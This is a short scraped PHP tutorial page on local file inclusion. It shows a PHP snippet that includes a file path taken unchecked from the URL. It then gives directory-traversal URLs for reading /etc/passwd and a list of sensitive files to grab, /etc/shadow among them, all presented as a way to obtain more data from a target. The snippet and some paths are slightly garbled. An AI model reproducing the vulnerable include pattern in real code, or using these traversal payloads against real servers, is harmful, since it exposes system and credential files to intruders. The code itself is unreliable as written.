Home > Article > Backend Development > PHP fakes local files containing vulnerable code_PHP tutorial
PHP fakes local files containing vulnerable code_PHP tutorial
- WBOYOriginal
- 2016-07-21 15:23:401027browse
Code:
Copy code The code is as follows:
$page=$_GET['page' ];
include($page.'php');
?>
You can use it like this
http://www.xxx.com/index.php ?page=../etc/passwd
http://www.xxx.com/index.php?page=../../../etc/passwd
http://www.xxx .com/index.php?page=..../../etc/passwd
Get more data:
etc/profile
etc/services
/etc/passwd
/etc/shadow
/etc/group
/etc/security/group
/etc/security/passwd
/etc/security/user
/etc/security/environ
/etc/security/limits
/usr/lib/security/mkuser.default
from hackteach
Statement:
The content of this article is voluntarily contributed by netizens, and the copyright belongs to the original author. This site does not assume corresponding legal responsibility. If you find any content suspected of plagiarism or infringement, please contact admin@php.cn
Previous article:PHP+MYSQL membership system login and permission judgment implementation code_PHP tutorialNext article:PHP+MYSQL membership system login and permission judgment implementation code_PHP tutorial